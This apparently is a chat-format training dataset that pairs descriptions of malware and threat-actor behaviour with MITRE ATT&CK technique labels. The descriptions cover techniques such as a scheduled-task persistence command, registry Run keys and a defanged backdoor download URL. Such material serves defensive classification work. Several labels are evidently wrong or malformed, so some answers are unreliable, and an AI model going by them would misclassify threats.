- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hildegard has used xmrig to mine cryptocurrency."
- },
- {
- "role": "assistant",
- "content": "T1496 - Resource Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GrimAgent can use an AES key to encrypt C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Endpoint Protection . Patchwork cyberespionage group expands targets from governments to wide range of industries . The Patchwork attack group has been targeting more than just government-associated organizations. Symantec Security Response has been actively monitoring Patchwork, also known as Dropping Elephant, which uses Chinese-themed content as bait to compromise its targets’ networks. A customized website with content related to the Chinese military . The malicious sites link to files hosted on different domains, which appear to be solely used for malicious purposes. The PowerPoint files appear to exploit the Microsoft Windows OLE Package Manager Remote Code Execution Vulnerability (CVE-2014-4114), which was used in the Sandworm attacks against American and European targets in October 2014. The rich text files typically attempt to exploit the Microsoft Office Memory Corruption Vulnerability (CVE-2015-1641), which was patched in April 2015. Users should manually remove any potential dropped files which would typically be named “sysvolinfo.exe”. Malicious Word .doc file Besides the .pps file, the threat actor uses rich text files to deliver the malware. While other researchers have reported that these files exploit CVE-2012-0158, Symantec has also observed CVE-2015-1641 being exploited to drop Backdoor.Steladok. As two file types are used to deliver two different payloads, there are likely multiple individuals or groups contributing to the malware development efforts. Mitigation Users should adhere to the following advice to prevent Patchwork’s attacks from succeeding: - Delete any suspicious-looking emails you receive, especially if they contain links or attachments. Spear-phishing emails are frequently used by cyberespionage attackers as a means of luring victims into opening malicious files"
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "performs thread execution hijacking to inject its orchestrator into a running thread from a remote process. performs a separate injection of its communication module into an Internet accessible process through which it performs C2."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Grandoreiro can block the Deibold Warsaw GAS Tecnologia security tool at the firewall level."
- },
- {
- "role": "assistant",
- "content": "T1562.004 - Impair Defenses: Disable or Modify System Firewall"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly 2.0 moved laterally via RDP."
- },
- {
- "role": "assistant",
- "content": "T1021.001 - Remote Services: Remote Desktop Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "leveraged PowerShell to download and execute additional scripts for execution."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "More information about the OwaAuth web shell is available in Appendix C"
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Winnti Linux variant’s core functionality is within ‘libxselinux’. Upon execution, an embedded configuration is decoded from the data section using a simple XOR cipher. An example Python function to decode this configuration is shown below"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information', 'T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Small Sieve has the ability to add itself to `HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\OutlookMicrosift` for persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sibot will delete an associated registry key if a certain server response is received."
- },
- {
- "role": "assistant",
- "content": "T1070 - Indicator Removal on Host"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dacls can collect data on running and parent processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Remcos uses the infected hosts as SOCKS5 proxies to allow for tunneling and proxying."
- },
- {
- "role": "assistant",
- "content": "T1090 - Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Machete sends stolen data to the C2 server every 10 minutes."
- },
- {
- "role": "assistant",
- "content": "T1029 - Scheduled Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For newer operating systems, events.exe creates task.xml as follows: Then it creates a Windows scheduled task using the following command: schtasks.exe /create /TN \\\"Events\\\\CacheTask_\" /XML \\\"t /F\" At the system registry level, modules achieve persistence by adding themselves into the key: HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit when it finds possible add values to the Winlogon subkey, and in HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Microsoft Activity Manager"
- },
- {
- "role": "assistant",
- "content": "T1053 - Scheduled Task/Job', 'T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FunnyDream can use `rundll32` for execution of its components."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The download process is the same with the previous variant, the loader resolves the command and control server IP address using a hardcoded list of DNS servers and then downloads the corresponding file. An interesting addition, in the latest samples, is the use of an alternative command and control server IP address, in case the primary one fails. The alternative IP address is generated by applying a bitwise XOR operation to each byte of the resolved command and control IP address with the byte 0xFE. In addition, as a possible anti-behaviour method, the loader verifies that the command and control server IP address is not ‘127.0.0.1’. Both of these methods are also present in the latest Team9 backdoor variants"
- },
- {
- "role": "assistant",
- "content": "T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WINEKEY maintains persistence through reboot via the use of registry RUN keys. Searching for anomalous RUN keys enterprise-wide can help to identify systems impacted by this malware"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This campaign is different from prior activity because a new dropper was observed being used by Rocke that is written in Go (Golang) instead of Python. The detection for the malware on VirusTotal (VT) is nearly non-existent. Figure 1, below, shows the detections for the most recent sample submitted to VT. It can be seen that only one engine successfully detected it as malicious"
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CreepyDrive can use cloud services including OneDrive for data exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For all non-removable drives on a victim, executes automated collection of certain files for later exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can be used to discover services running on a system."
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collects its process identifier (PID) on the victim."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PHOTO: a DLL backdoor also reported publicly as “Derusbi”, capable of obtaining directory, file, and drive listing; creating a reverse shell; performing screen captures; recording video and audio; listing, terminating, and creating processes; enumerating, starting, and deleting registry keys and values; logging keystrokes, returning usernames and passwords from protected storage; and renaming, deleting, copying, moving, reading, and writing to files"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SUGARUSH has checked for internet connectivity from an infected host before attempting to establish a new TCP connection."
- },
- {
- "role": "assistant",
- "content": "T1016.001 - System Network Configuration Discovery: Internet Connection Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BlackTech has used DLL side loading by giving DLLs hardcoded names and placing them in searched directories."
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses port 46769 for C2."
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "achieves persistence by creating a shortcut in the current user's Startup folder."
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BackConfig can download and run batch files to execute commands on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Upon execution, Pay2Key is reading the Server and Port keys from the configuration file. If a configuration file was not found in the current working directory and wasn’t supplied in the command line arguments, the ransomware will write “no config file found” to a file at .\\Cobalt-Client-log.txt. This log file will be used extensively by the ransomware during its execution. Newer versions of the ransomware are making sure to remove this log file from the disk. The full list of supported log messages can be found in the appendix section of this article"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RTM can add a certificate to the Windows store."
- },
- {
- "role": "assistant",
- "content": "T1553.004 - Subvert Trust Controls: Install Root Certificate"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses SSL to encrypt its communication with its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "creates a backdoor through which remote attackers can open a command-line interface."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter', 'T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RemoteUtilities can take screenshots on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Night Dragon, threat actors used company extranet servers as secondary C2 servers."
- },
- {
- "role": "assistant",
- "content": "T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dipsind can spawn remote shells."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After using raw sockets to communicate with its C2 server, uses a decrypted string to create HTTP POST requests."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MuddyWater has used a Word Template, Normal.dotm, for persistence."
- },
- {
- "role": "assistant",
- "content": "T1137.001 - Office Application Startup: Office Template Macros."
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bumblebee has gained execution through luring users into opening malicious attachments."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DCSrv has masqueraded its service as a legitimate svchost.exe process."
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation CuckooBees, the threat actors used the `net start` command as part of their initial reconnaissance."
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Frankenstein, the threat actors used WMI queries to determine if analysis tools were running on a compromised system."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Skidmap has the ability to check if \"/usr/sbin/setenforce\" exists. This file controls what mode SELinux is in."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "drops a Word file containing a Base64-encoded file in it that is read, decoded, and dropped to the disk by the macro."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GeminiDuke collects information on network settings and Internet proxy settings from the victim."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 has acquired C2 domains, sometimes through resellers."
- },
- {
- "role": "assistant",
- "content": "T1583.001 - Domains"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ryuk can remotely create a scheduled task to execute itself on a system."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Researchers also observed that the backdoor downloads and executes the Cobalt Strike pentesting and post-exploitation toolkit on the victim's machine within some period of time after the infection. By deploying Cobalt Strike, it is clear that this stealthy backdoor is being used to gain a foothold in corporate networks so that ransomware can be deployed, data can be stolen, or network access could be sold to other threat actors"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "performs local network connection discovery using netstat."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An analysis of these files found that they all leveraged a remote template injection technique that allows the documents to pull down the malicious code once they are opened. This allows the attacker to have control over what content is sent back to the victim in an otherwise benign document. Recent examples of the remote template “dot” file URLs these documents use include the following"
- },
- {
- "role": "assistant",
- "content": "T1221 - Template Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Patchwork leveraged the DDE protocol to deliver their malware."
- },
- {
- "role": "assistant",
- "content": "T1559.002 - Inter-Process Communication: Dynamic Data Exchange"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "checks for sandboxing libraries and debugging tools."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Additional mitigations that could help to prevent attacks like these from succeeding in your environment include: Changing the default handler for “.hta” files in your environment so that they cannot be directly executed.hta” files in your environment so that they cannot be directly executed"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion', 'T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KARAE can use public cloud-based storage providers for command and control."
- },
- {
- "role": "assistant",
- "content": "T1102.002 - Bidirectional Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A Gamaredon Group file stealer has the capability to steal data from newly connected logical volumes on a system, including USB drives."
- },
- {
- "role": "assistant",
- "content": "T1025 - Data from Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "While Cobalt Gang 1.0 uses ThreadKit extensively, Cobalt 2.0 adds sophistication to its delivery method, borrowing some of the network infrastructures used by both APT28 (aka Fancy Bear) and MuddyWater. One of the Cobalt 2.0 Group’s latest campaigns, an attack that leads to a Cobalt Strike beacon and to JavaScript backdoor, was investigated and presented by the Talos research team. Cobalt Group Technical Details . Stage 1 - Word Macro + Whitelisting Bypass . As with many other campaigns, the victim received a document with malicious macro visual basic code. In our case the attacker abused cmstp to execute JavaScript scriptlet (XML with JS) that is downloaded from the e-dropbox[.]biz site. Although some security solutions will block all PureBasic programs (wrong move – there are plenty of legitimate PureBasic programs in use today), it’s a smart move made by the attacker group. The right side of the pair is the name of the JavaScript in the next stage (stage 4) , while the left side of the pair represents the file that will be downloaded as part of stage 5. Such a combination of registry manipulation was reported a year ago as part of an attack campaign executed by the Cobalt Group against Ukrainian banks. As part of the last execution step of the dll, the malicious code writes a JavaScript scriptlet into the Roaming directory and then it executes CreateProcess on the regsvr32 as described by the UserInitMprLogonScript. Stage 5 - JavaScript Backdoor . The last stage JavaScript is downloaded from hxxps://server.vestacp[.]kz/robots.txt. Organizations should expect to see much more coming from all Cobalt Group factions during the next year"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The first spear phish from group “Admin@338” was sent to a foreign government in the Asian Pacific region on March 10, 2014 – just two days after the flight disappeared. The threat actors sent a spear-phishing email with an attachment titled, “Malaysian Airlines MH370.doc” (MD5: 9c43a26fe4538a373b7f5921055ddeae). Although threat actors often include some sort of “decoy content” upon successful exploitation (that is, a document representing what the recipient expected to open), in this case, the user is simply shown a blank document."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment', 'T1203 - Exploitation for Client Execution', 'T1566 - Phishing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is capable of downloading files, including additional modules."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PoshC2 can use protocols like HTTP/HTTPS for command and control traffic."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 has used encoded PowerShell commands."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chimera's malware has altered the NTLM authentication program on domain controllers to allow Chimera to login without a valid credential."
- },
- {
- "role": "assistant",
- "content": "T1556.001 - Domain Controller Authentication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "EVILNUM has used the Windows Management Instrumentation (WMI) tool to enumerate infected machines."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WhisperGate has the ability to enumerate fixed logical drives on a targeted system."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The first link was labeled as \"Comparison of Major Tasks in '16 & '17\" and the second link was identified as \"Comparison between '16 & '17\".Upon opening these links the user was presented with a further decoy Hangul document"
- },
- {
- "role": "assistant",
- "content": "T1598.003 - Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kevin can Base32 encode chunks of output files during exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some Reaver variants use raw TCP for C2."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "adds an entry to the rc.common file for persistence."
- },
- {
- "role": "assistant",
- "content": "T1037.004 - Boot or Logon Initialization Scripts: Rc.common"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "leverages a custom packer to obfuscate its functionality."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
